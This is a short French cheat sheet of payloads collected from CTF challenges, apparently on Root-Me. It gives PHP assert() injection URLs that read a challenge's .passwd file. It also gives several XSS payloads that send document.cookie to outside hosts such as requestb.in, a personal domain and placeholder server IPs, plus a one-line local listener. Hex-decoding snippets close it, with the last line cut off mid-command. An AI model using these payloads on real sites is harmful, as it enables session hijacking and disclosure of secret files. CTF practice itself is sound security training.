Vulnérabilités trouvés lors des CTF

PHP assert() (vulnérabilité par LFI = Local File Inclusion)

http://challenge01.root-me.org/web-serveur/ch47/?page=','..') === false and $flag = fopen('.passwd','r') and print fread($flag, filesize('.passwd')) and strpos('
http://challenge01.root-me.org/web-serveur/ch47/?page=' and die(show_source('includes/../.passwd')) or '

Sources : https://github.com/Kevin-KSIS/Root-me/blob/master/Web_server.md#16

Type binaire

https://retdec.com/decompilation/

Il existe deux type de XSS : La stored qui est permanente et la Reflected qui est tomporaire

<img src="a" onerror="document.location='https://requestb.in/sdu1lasd?cookie='+document.cookie"/>
<img src="a" onerror="document.location='http://test.bruno-tatu.com/index.php?cookie='+document.cookie"/>
url?var=<img src="a" onerror="alert("_");"/>
" /><img src="http://my_server_ip/?cookie='+document.cookie'"></img>

On peut utiliser rapidement un serveur local :

python -m SimpleHTTPServer 8080
<script>document.location('http://IP_EXTERNE/'+document.cookie)</script>

Binaire → ascii

alert("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31".split(',').map(function(v) {
    return String.fromCharCode(v);
}).join(''));

Binaire → charCode

echo -ne "\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30""